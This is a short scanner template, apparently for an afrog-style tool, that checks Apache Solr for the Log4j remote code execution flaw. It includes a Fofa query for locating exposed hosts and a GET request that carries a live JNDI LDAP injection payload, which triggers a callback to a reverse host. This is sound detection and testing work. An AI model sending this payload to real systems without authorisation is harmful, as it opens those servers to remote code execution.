id: solr-log4j-rce

info:
  name: Apache Solr Log4j RCE
  author: zan8in
  severity: critical
  description: |
    Fofa: app="APACHE-Solr"
  reference:
    - http://wiki.peiqi.tech/wiki/webserver/Apache/Apache%20Solr%20Log4j%E7%BB%84%E4%BB%B6%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /solr/admin/collections?action=${jndi:ldap://{{reverseHost}}}&wt=json
    expression: reverse.wait(5)
expression: r0()